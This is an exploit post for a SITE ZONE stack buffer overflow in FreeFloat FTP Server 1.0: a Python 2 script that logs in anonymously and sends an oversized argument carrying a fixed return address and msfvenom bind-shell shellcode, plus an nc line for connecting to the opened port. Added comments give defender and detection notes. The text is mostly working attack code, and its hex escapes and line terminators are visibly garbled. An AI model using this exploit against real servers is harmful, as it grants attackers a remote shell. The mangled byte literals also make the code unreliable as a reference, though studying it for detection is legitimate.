Freefloat FTP Server 1.0 SITE ZONE Buffer Overflow
Posted on 05 November 2016
#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: FreeFloat FTP Server BoF SITE ZONE Command
# Date: 04/11/2016
# Exploit Author: Luis Noriega
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.0
# Tested on: Windows XP Profesional V. 5.1 Service Pack 3
# CVE : n/a
#
# Proof-of-concept for a stack buffer overflow in FreeFloat FTP Server 1.0:
# after an anonymous login the script sends a single SITE ZONE command whose
# argument is several hundred bytes long, overwriting the saved return
# address with a hard-coded pointer into GDI32.dll and landing in the
# attached payload.  Everything below is a flat script with no functions,
# no error handling and Python 2 syntax (print statement, str payloads).
#
# Defender notes:
#  - The precondition is an anonymous FTP login plus one oversized SITE ZONE
#    argument; a SITE command with an argument of this length (mostly
#    repeated filler bytes) is a straightforward log/IDS signature.
#  - The payload is a bind shell (see the msfvenom line below): a successful
#    run leaves a new listening socket on the target.  An unexpected listener
#    appearing right after an FTP session is the host-side indicator.
#  - The return address is fixed for one OS/DLL build (XP SP3 per the header),
#    so the PoC is tied to that build; hosts with address-space randomisation
#    are not covered by this listing.
import socket
# shellcode with metasploit:
# msfvenom -p windows/shell_bind_tcp -b 'x00x0Ax0D' -f c
# nc 192.168.1.150 4444
# Bind-shell payload generated by msfvenom; the -b list excludes bytes the
# FTP command parser would treat as terminators (NUL, LF, CR).  The nc line
# records how the author reached the listener afterwards (port 4444).
ret = "x2Fx1DxF1x77" # GDI32.dll
# ret: 4-byte return-address overwrite, little-endian, pointing into GDI32.dll
# on the tested XP SP3 build (per the author's note) -- not portable to other
# builds.
shellcode = ("xb8x78xa3x16x0cxddxc2xd9x74x24xf4x5bx31xc9xb1"
"x53x31x43x12x83xebxfcx03x3bxadxf4xf9x47x59x7a"
"x01xb7x9ax1bx8bx52xabx1bxefx17x9cxabx7bx75x11"
"x47x29x6dxa2x25xe6x82x03x83xd0xadx94xb8x21xac"
"x16xc3x75x0ex26x0cx88x4fx6fx71x61x1dx38xfdxd4"
"xb1x4dx4bxe5x3ax1dx5dx6dxdfxd6x5cx5cx4ex6cx07"
"x7ex71xa1x33x37x69xa6x7ex81x02x1cxf4x10xc2x6c"
"xf5xbfx2bx41x04xc1x6cx66xf7xb4x84x94x8axcex53"
"xe6x50x5ax47x40x12xfcxa3x70xf7x9bx20x7exbcxe8"
"x6ex63x43x3cx05x9fxc8xc3xc9x29x8axe7xcdx72x48"
"x89x54xdfx3fxb6x86x80xe0x12xcdx2dxf4x2ex8cx39"
"x39x03x2exbax55x14x5dx88xfax8exc9xa0x73x09x0e"
"xc6xa9xedx80x39x52x0ex89xfdx06x5exa1xd4x26x35"
"x31xd8xf2xa0x39x7fxadxd6xc4x3fx1dx57x66xa8x77"
"x58x59xc8x77xb2xf2x61x8ax3dxedx2dx03xdbx67xde"
"x45x73x1fx1cxb2x4cxb8x5fx90xe4x2ex17xf2x33x51"
"xa8xd0x13xc5x23x37xa0xf4x33x12x80x61xa3xe8x41"
"xc0x55xecx4bxb2xf6x7fx10x42x70x9cx8fx15xd5x52"
"xc6xf3xcbxcdx70xe1x11x8bxbbxa1xcdx68x45x28x83"
"xd5x61x3ax5dxd5x2dx6ex31x80xfbxd8xf7x7ax4axb2"
"xa1xd1x04x52x37x1ax97x24x38x77x61xc8x89x2ex34"
"xf7x26xa7xb0x80x5ax57x3ex5bxdfx67x75xc1x76xe0"
"xd0x90xcax6dxe3x4fx08x88x60x65xf1x6fx78x0cxf4"
"x34x3exfdx84x25xabx01x3ax45xfe")
# buffer: a short NOP sled (30 x 0x90 as the author wrote it) followed by
# the payload, so that control landing anywhere in the sled reaches it.
buffer = 'x90' * 30 + shellcode
# buffer1: the SITE ZONE argument.  Layout as written by the author:
#   242 bytes of filler  -> reaches the saved return address (the offset)
#   ret                  -> overwrites it
#   buffer               -> sled + payload
#   'A' padding          -> keeps ret + buffer + padding at a fixed 749 bytes
# NOTE(review): the length arithmetic assumes every escape is one byte; the
# hex escapes in this listing are rendered without backslashes, so the
# literal lengths here differ from the author's intent -- verify before
# relying on the offsets for a detection rule.
buffer1 = 'x4C' * 242 + ret + buffer + 'x41' * (749-len(buffer))
print "Sending Buffer"
# Plain TCP session to the FTP control port; the target address is hard-coded
# (a private lab address in this listing).  connect() returns None, so the
# 'connect' name is never meaningful; no timeouts and no reply checking --
# each recv() just drains the server banner/response before the next command.
s = socket.socket(socket.AF_INET, socket. SOCK_STREAM)
connect = s.connect(('192.168.1.150', 21))
s.recv(1024)
# Anonymous login: the overflow is reachable without credentials, which is
# why restricting anonymous access (or the service itself) removes the
# precondition.
s.send('USER anonymous ')
s.recv(1024)
s.send('PASS anonymous ')
s.recv(1024)
# The overflowing command: 'SITE ZONE' immediately followed by the oversized
# argument.  (The line terminators appear to have been lost in this listing,
# leaving a bare trailing space.)
s.send('SITE ZONE' + buffer1 + ' ')
s.close()